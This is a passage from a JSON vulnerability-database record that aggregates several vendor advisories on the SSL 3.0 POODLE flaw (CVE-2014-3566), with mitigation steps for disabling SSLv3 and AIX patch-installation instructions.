then try with the older version of the Protocol negotiation. Be able to implement man in the middle attacks the attacker by making the affected versions of the browser and the server using newer Protocol negotiation failed connection, you can successfully achieve a downgrade attack, so that the client and the server using the insecure SSL3. 0 communicate, in this case, since the SSL 3.0 use of CBC block encryption implementation vulnerability exists, an attacker can successfully crack the SSL connections encrypt the information, such as access to user cookie data. This attack is called POODL attack(Padding Oracle On Downgraded Legacy Encryption) is.\n\nThis vulnerability affected the vast majority of SSL server and client, the impact of a wide range. But the attacker as to the use of successful, need to be able to control the client and server between the data(perform a MiTM attack).\n\nHow to fix POODLE SSLv3 security vulnerability (CVE-2014-3566) http://www.linuxidc.com/Linux/2014-10/108103.htm\n\n## Recommendations\n\nTemporary workaround:\n\nIf you can not immediately install patches or upgrades, NSFOCUS recommend that you take the following measures to reduce the threat:\n\n * Disable the SSL 3.0 Protocol.\n\nThe current popular browsers, only IE 6.0 still does not support TLS 1.0, disable SSL 3.0 Protocol will affect IE 6 clients SSL access.\n\n## The service end of the Disable method:\n\n### Apache 2. x\n\nIn the mod_ssl configuration file use the following command to disable SSLv2 and SSLv3 with: SSLProtocol All-SSLv2-SSLv3 Restart Apache\n\n### Nginx\n\nIn the configuration file to use: ssl_protocols TLSv1 TLSv1. 1 TLSv1. 2; Restart Nginx\n\n### IIS\n\nFind the following registry key: HKey_Local_Machine\\System\\CurrentControlSet\\Control\\SecurityProviders \\SCHANNEL\\Protocols This registry key usually contains the following sub-items:\n\n * PCT 1.0\n * SSL 2.0\n * SSL 3.0\n * TLS 1.0\n\nEach of the registry entries are reserved for in the Protocol-related information. Can be on the server, disable these protocols in any one. To do this, the Protocol SSL 3.0, the server subkey create a new DWORD Value. The DWORD value is set to\u201c00 00 00 00\u201dit.\n\n## Browser disable method:\n\nIE: \"Tools\" -&gt; \"Internet Options\" -&gt; \"Advanced\", uncheck\"use SSL 3.0\"check box.\n\nChrome:\n\nCopy a usually open Chrome browser shortcuts, the new shortcut on right-click, Go into properties, In the\"target\"behind the spaces in the end of the field, enter the following command --ssl-version-min=tls1\n\nFireFox:\n\nIn the address bar enter\"about:config\", and then the security. tls. version. min adjusted to 1.\n\n### Reference:\n\n * https://www.openssl.org/~bodo/ssl-poodle. pdf\n * http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html \n * https://technet.microsoft.com/en-us/library/security/3009008\n", "reporter": "janes", "published": "2017-02-17T00:00:00", "type": "seebug", "title": "SSL 3.0 POODLE\uff08CVE-2014-3566\uff09", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92692", "id": "SSV:92692", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "cve,poc,details"}], "paloalto": [{"lastseen": "2018-08-31T00:11:38", "references": [], "description": "A vulnerability affecting most implementations of SSL 3.0 has been discovered that allows an attacker to decrypt some encrypted contents under certain conditions (CVE-2014-3566). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue. More information can be found at: https://www.openssl.org/~bodo/ssl-poodle.pdf. SSL 3.0 is a supported protocol in PAN-OS services including device management and SSL VPN.\n", "edition": 3, "reporter": "Palo Alto Networks Product Security Incident Response Team", "published": "2014-10-20T00:00:00", "title": "SSL 3.0 MITM Attack (CVE-2014-3566)", "type": "paloalto", "enchantments": {"score": {"modified": "2018-08-31T00:11:38", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PAN-OS", "version": "6.1.1", "operator": "le"}, {"name": "PAN-OS", "version": "5.0.", "operator": "le"}, {"name": "PAN-OS", "version": "6.0.7", "operator": "le"}, {"name": "PAN-OS", "version": "5.1.", "operator": "le"}], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-20T00:00:00", "id": "PAN-SA-2014-0005", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/25", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:25:46", "references": [], "description": "CVE-2014-3566 SSLV3 POODLE\n\n# \n\nModerate\n\n# Vendor\n\nThe SSL protocol 3.0, as used in OpenSSL through 1.0.1i\n\n# Versions Affected\n\n * SSLv3 \n\n# Description\n\nSSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346] and TLS 1.2 [RFC5246], many TLS implementations remain backwards \u00adcompatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.\n\nThe protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. However, even if a client and server both support a version of TLS, the security level offered by SSL 3.0 is still relevant since many clients implement a protocol downgrade dance to work around server\u00adside interoperability bugs. Attackers can exploit the downgrade dance and break the cryptographic security of SSL 3.0. Our POODLE attack (Padding Oracle On Downgraded Legacy Encryption) will allow them, for example, to steal \u201csecure\u201d HTTP cookies (or other bearer tokens such as HTTP Authorization header contents).\n\n# Affected Products and Versions\n\n_Severity is moderate unless otherwise noted. \n_\n\n * BOSH: All versions of Cloud Foundry BOSH stemcells 2743 and prior use SSLv3 and thus are vulnerable to CVE-2014-3356 \n * tc Server 2.9.0 to 2.9.7 and 3.0.0 to 3.0.1. Previous, unsupported tc Server versions may also be affected. \n\n# Mitigation\n\nThe Cloud Foundry project recommends that HAProxy or any other ELBs is use be updated to disable SSLv3 as a workaround that resolves CVE-2014-3566.\n\nThe details published by the Apache Software Foundation for [mitigating this attack for Apache Tomcat](<https://wiki.apache.org/tomcat/Security/POODLE>) apply equally to tc Runtime instances. The tc Server team is tracking the work of the Apache Tomcat project to release versions of Apache Tomcat that disable SSLv3 by default. tc Server releases will follow the releases from the Apache Software Foundation.\n\n# Credit\n\nGoogle researchers Bodo M\u00f6ller, Thai Duong and Krzysztof Kotowicz released a [paper](<https://www.openssl.org/~bodo/ssl-poodle.pdf>) discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566>\n * <https://www.openssl.org/~bodo/ssl-poodle.pdf>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n * <https://wiki.apache.org/tomcat/Security/POODLE>\n\n# History\n\n2014-Oct-16: Initial vulnerability report published.\n\n2013-Nov-03: Updated to include tc Server information\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2014-10-16T00:00:00", "title": "CVE-2014-3566 SSLV3 POODLE | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566", "CVE-2014-3356"], "modified": "2014-10-16T00:00:00", "id": "CFOUNDRY:ACE3C7E4A01EEFAC1C8D47279076DC77", "href": "https://www.cloudfoundry.org/blog/cve-2014-3566/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:41", "references": ["http://sourceforge.net/p/davmail/mailman/message/33279118/", "http://sourceforge.net/p/davmail/code/2322/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.6.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "davmail", "operator": "lt"}], "description": "\nMicka\u00c3\u00abl Guessant reports:\n\nDavMail 4.6.0 released\nEnhancements: Fix potential CVE-2014-3566 vulnerability.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-10-27T00:00:00", "title": "davmail -- fix potential CVE-2014-3566 vulnerability (POODLE)", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-27T00:00:00", "id": "384FC0B2-0144-11E5-8FDA-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/384fc0b2-0144-11e5-8fda-002590263bf5.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:47", "references": ["https://www.openssl.org/news/secadv_20141015.txt"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1j", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mingw32-openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mingw32-openssl", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1e_1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-c6-openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "8.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "8.4_17", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1_16", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "lt"}], "description": "\nThe OpenSSL Project reports:\n\nA flaw in the DTLS SRTP extension parsing code allows an\n\t attacker, who sends a carefully crafted handshake message,\n\t to cause OpenSSL to fail to free up to 64k of memory causing\n\t a memory leak. This could be exploited in a Denial Of Service\n\t attack. This issue affects OpenSSL 1.0.1 server implementations\n\t for both SSL/TLS and DTLS regardless of whether SRTP is used\n\t or configured. Implementations of OpenSSL that have been\n\t compiled with OPENSSL_NO_SRTP defined are not affected.\n\t [CVE-2014-3513].\nWhen an OpenSSL SSL/TLS/DTLS server receives a session\n\t ticket the integrity of that ticket is first verified.\n\t In the event of a session ticket integrity check failing,\n\t OpenSSL will fail to free memory causing a memory leak.\n\t By sending a large number of invalid session tickets an\n\t attacker could exploit this issue in a Denial Of Service\n\t attack. [CVE-2014-3567].\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow\n\t applications to block the ability for a MITM attacker to\n\t force a protocol downgrade.\nSome client applications (such as browsers) will reconnect\n\t using a downgraded protocol to work around interoperability\n\t bugs in older servers. This could be exploited by an active\n\t man-in-the-middle to downgrade connections to SSL 3.0 even\n\t if both sides of the connection support higher protocols.\n\t SSL 3.0 contains a number of weaknesses including POODLE\n\t [CVE-2014-3566].\nWhen OpenSSL is configured with \"no-ssl3\" as a build option,\n\t servers could accept and complete a SSL 3.0 handshake, and\n\t clients could be configured to send them. [CVE-2014-3568].\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-10-15T00:00:00", "title": "OpenSSL -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2016-08-09T00:00:00", "id": "03175E62-5494-11E4-9CC1-BC5FF4FB5E7B", "href": "https://vuxml.freebsd.org/freebsd/03175e62-5494-11e4-9cc1-bc5ff4fb5e7b.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:14:47", "references": ["http://downloads.asterisk.org/pub/security/AST-2014-011.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "11.13.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "asterisk11", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.8.31.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "asterisk", "operator": "lt"}], "description": "\nThe Asterisk project reports:\n\nThe POODLE vulnerability is described under CVE-2014-3566.\n\t This advisory describes the Asterisk's project susceptibility\n\t to this vulnerability.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-10-20T00:00:00", "title": "asterisk -- Asterisk Susceptibility to POODLE Vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-20T00:00:00", "id": "76C7A0F5-5928-11E4-ADC7-001999F8D30B", "href": "https://vuxml.freebsd.org/freebsd/76c7a0f5-5928-11e4-adc7-001999f8d30b.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "aix": [{"lastseen": "2018-08-31T00:08:33", "aixFileset": [{"productVersions": ["any"], "versionGte": "0.9.8.401", "fileset": "openssl.base", "versionLte": "0.9.8.2503", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "1.0.1.500", "fileset": "openssl.base", "versionLte": "1.0.1.512", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "12.9.8.1100", "fileset": "openssl.base", "versionLte": "12.9.8.2503", "productName": "aix"}], "references": [], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: <Wed Oct 29 04:58:52 CDT 2014>\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\n1.VULNERABILITY: AIX OpenSSL Denial of Service due to memory leak in DTLS SRTP extension\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3513\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n2. VULNERABILITY: AIX OpenSSL Patch to mitigate CVE-2014-3566\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3566\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n3. VULNERABILITY: AIX OpenSSL Denial of Service due to memory consumption\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3567\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION \n \n 1. CVE-2014-3513\n\tOpenSSL could allow remote attackers to cause a denial of service \n\t(memory consumption) via crafted handshake message\n\n 2. CVE-2014-3566\n\tSSL protocol 3.0 uses nondeterministic CBC padding, which makes it easier\n\tfor man-in-the-middle attackers to obtain cleartext data via a \n\tpadding-oracle attack.\n\n 3. CVE-2014-3567\n\tOpenSSL could allow remote attackers to cause a denial of service \n\t(memory consumption) via crafted session ticket that triggers an \n\tintegrity-check failure.\n\nII. CVSS\n\n 1. CVE-2014-3513\n CVSS Base Score: 5\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97035\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n 2. CVE-2014-3566\n CVSS Base Score: 4.3\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97013\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n 3. CVE-2014-3567\n CVSS Base Score: 5\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97036\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L openssl.base\n \n The following fileset levels are vulnerable:\n \n A. CVE-2014-3513\n\n AIX Fileset Lower Level Upper Level \n ------------------------------------------\n openssl.base 1.0.1.500 1.0.1.512\n\n B. CVE-2014-3566, CVE-2014-3567\n\n AIX Fileset Lower Level Upper Level \n ------------------------------------------\n openssl.base 1.0.1.500 1.0.1.512\n openssl.base 0.9.8.401 0.9.8.2503\n openssl.base 12.9.8.1100 12.9.8.2503\n\n\tNote, 0.9.8.401 and 12.9.8.1100 are the Lowest OpenSSL version\n\tavailable in aix web download site. Even OpenSSL versions below \n\tthis are impacted\n\n\nIV. SOLUTIONS\n\n A. FIXES\n\n Fix is available. The fix can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix11.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n\tNote that the tar file contains Interim fixes that are based on OpenSSL version.\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation)\n ---------------------------------------------------------------------------------\n 5.3, 6.1, 7.1 IV66250s9a.141027.epkg.Z\t openssl.base(1.0.1.512 version)\n 5.3, 6.1, 7.1 IV66250s9b.141027.epkg.Z openssl.base(0.9.8.2503 version)\n 5.3, 6.1, 7.1 IV66250s9c.141027.epkg.Z\t openssl.base(12.9.8.2503 version)\n\n VIOS Level Interim Fix (*.Z)\t Fileset Name(prereq for installation)\n -------------------------------------------------------------------------------------\n 2.2.* IV66250s9a.141027.epkg.Z\t openssl.base(1.0.1.512 version)\n 2.2.* IV66250s9b.141027.epkg.Z\t openssl.base(0.9.8.2503 version)\n 2.2.* IV66250s9c.141027.epkg.Z\t openssl.base(12.9.8.2503 version)\n\n\n To extract the fix from the tar file:\n\n tar xvf openssl_fix11.tar\n cd openssl_fix11\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 \t\t\t\t\t\t filename\t \n ----------------------------------------------------------------------------------------------\n \t5bde653c4cb972b7068aa99a49c4a388abf2cdc0627fd61d2a7278b7a5d1e1cb \tIV66250s9a.141027.epkg.Z\n\tb8a8c74835add78314e48540640f50478ec11b08195fe2df979f7d1597722a60\tIV66250s9b.141027.epkg.Z\n\t8b3b019c6ed2bf0d54ed93f2e5159ace136c7ad7a8d3b1735748c0f13a4bc1cf\tIV66250s9c.141027.epkg.Z\n\n\tThese sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig \n\n\topenssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n These fixes will also be part of the next filesets of OpenSSL versions 0.9.8.2504, 12.9.8.2504 and 1.0.1.513.\n\tThe estimated availability date of filesets is by 1st December 2014 and can be downloaded from - \n\thttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\nV. WORKAROUNDS\n \n No workarounds.\n\nVI. CONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\n\nVII. REFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97035\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97013\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97036\n CVE-2014-3513 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n CVE-2014-3566 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n CVE-2014-3567 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 3, "reporter": "CentOS Project", "published": "2014-10-29T04:58:52", "title": "AIX OpenSSL Denial of Service due to memory leak in DTLS / AIX OpenSSL Patch to mitigate CVE-2014-3566 / AIX OpenSSL Denial of Service due to memory consumption", "type": "aix", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "aix": {"apars": []}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-29T04:58:52", "id": "OPENSSL_ADVISORY11.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:37", "aixFileset": [{"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", 